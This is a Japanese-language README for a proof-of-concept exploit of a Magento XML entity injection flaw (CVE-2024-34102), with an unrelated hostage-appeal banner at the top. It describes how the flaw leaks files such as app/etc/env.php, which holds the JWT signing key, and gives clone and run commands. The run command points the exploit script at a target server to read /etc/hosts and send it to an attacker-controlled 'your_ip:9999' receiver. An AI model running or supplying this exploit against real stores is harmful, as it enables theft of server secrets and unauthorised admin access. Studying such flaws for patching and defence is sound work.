私たちは、テロ組織ハマスによって人質に取られたすべての市民の安全な帰還を要求します。すべての人質が解放され、無事に帰宅するまで、私たちは休むことはありません。あなたも彼らを家に連れ戻す手助けができます。 https://stories.bringthemhomenow.net/
このリポジトリには、Magento における重大な XML エンティティインジェクションの脆弱性(CVE-2024-34102)に対する概念実証(PoC)エクスプロイトが含まれています。この脆弱性により、機密ファイルの外部への持ち出し(exfiltration)が可能になり、それを利用して Magento の管理機能への不正アクセスを獲得することができます。このエクスプロイトは教育目的で設計されており、責任を持って使用する必要があります。
Magento は、世界中で使用されている最も人気のある e コマースソリューションの 1 つです。2024 年 6 月に、CVE-2024-34102 として識別される重大な事前認証 XML エンティティインジェクションの問題が発見されました。この脆弱性は、JWT の署名に使用される暗号鍵を含む Magento の app/etc/env.php ファイルの外部への持ち出しなど、深刻な結果を引き起こす可能性があります。
requests ライブラリ(pip install requests)リポジトリをクローンします:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
必要な引数を指定してスクリプトを実行します:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: ターゲットとなる Magento インスタンスの URL。--target-file: 外部に持ち出すターゲットサーバー上のファイルパス。--exfil-url: 持ち出したデータを受信する URL。python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999